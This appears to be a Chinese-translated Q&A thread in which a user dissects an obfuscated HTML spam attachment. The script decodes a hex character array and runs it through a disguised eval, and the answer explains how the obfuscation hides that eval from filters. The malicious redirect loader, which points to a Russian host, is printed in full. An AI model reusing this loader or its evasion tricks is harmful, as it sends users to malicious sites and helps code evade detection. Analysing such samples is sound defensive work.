3

今天早上我收到了一些垃圾邮件。我注意到附件是一个 .html 文件。我没有将其丢弃,而是将其作为学习机会,并将其复制到我的桌面并将其重命名为 .txt 并将其加载到记事本中。

这是垃圾邮件附件中出现的 html + 混淆脚本:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>  
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>

<script>asgq=    [0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=56;if(dbshre){vfvwe=0;    try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["e".concat("val")];}
 s="";for(i=0;i-105!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}
 z=s;e(s);}}</script>
</body>
</html>

我做的第一件事是将它排成一行,使其更具可读性:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>  
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>

<script>
asgq=[0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];
try{document.body&=0.1} 
catch(gdsgsdg) 
{
 zz=3;
 dbshre=56;
   if(dbshre){
     vfvwe=0;
     try{}
     catch(agdsg)
     {vfvwe=1;}
     if(!vfvwe){
     e=window["e".concat("val")];
     s="";

   for(i=0;i-105!=0;i++){
     if(window.document)
        s+=String.fromCharCode(asgq[i]);
   }
z=s;
e(s);
    }  
   }
</script>
</body>
</html>

在这一点上,很明显脚本作者将好东西隐藏在 asgq 数组中作为字符代码。0x76 = "v", 0x61 = "a", 0x72 = "r" 等等...嗯,前 3 个元素已经拼出了 "var"!

asgq.length = 105。在 for 循环中,作者使用的结束条件是“i-105!=0”,这是一种令人困惑的说法 i < asgq.length。“zz=3;” 似乎什么都不做/不参与脚本的其余部分。在第一个 catch 语句之后还有一个不匹配的“{”。

我运行了 for 循环并将数组解压缩到一个警告框中。这是我得到的:

" var1=49; var2=var1; if(var1==var2) {document.location="http://giliaonso.ru:8080/forum/links/column.php";} "

所以作者正在经历用字符代码制作49 = 49的麻烦,如果49 = 49,那么window.location = russian site。

我的问题:

  1. 作者正在使用尝试缓存语句。第一个尝试条件是(document.body&=0.1)。这是设计为失败并继续到语句的缓存部分还是这是一些按位操作?如果它是按位的,为什么“= 0.1”?

  2. 第一个缓存正在传递“agdsg”。我只见过“e”通过的缓存(e)。传递除 e 之外的任何值有什么作用?

  3. “e=window["e".concat("val")];" 这行到底是什么 正在做?我似乎在充当作者后来调用的函数声明:“e(s);” "s" 是解压后的数组。

任何帮助表示赞赏。

4

1 回答 1

3

1)这会尝试分配0哪个document.body会引发错误:

document.body&=0.1
//is the same as
document.body = document.body & 0.1;
//document.body & *anything* returns 0

2)catch以可变名称作为参数,您可以随意命名(包括agdsg.

3)让我们分解一下:

e=window["e".concat("val")];
//"e".concat("val") returns "eval"
e=window["eval"]
//which gives you the global "eval()" function

基本上,作者将该数组解码为要执行的代码字符串,然后使用eval()它来运行它。他们不只是使用的原因eval("var ...")是因为混淆 eval 关闭(以及字符串)使得过滤器(或人类)更难看到它正在运行 eval。如果它知道它正在运行 eval,它可能会检查字符串并停止重定向代码。

于 2013-03-05T20:03:36.897 回答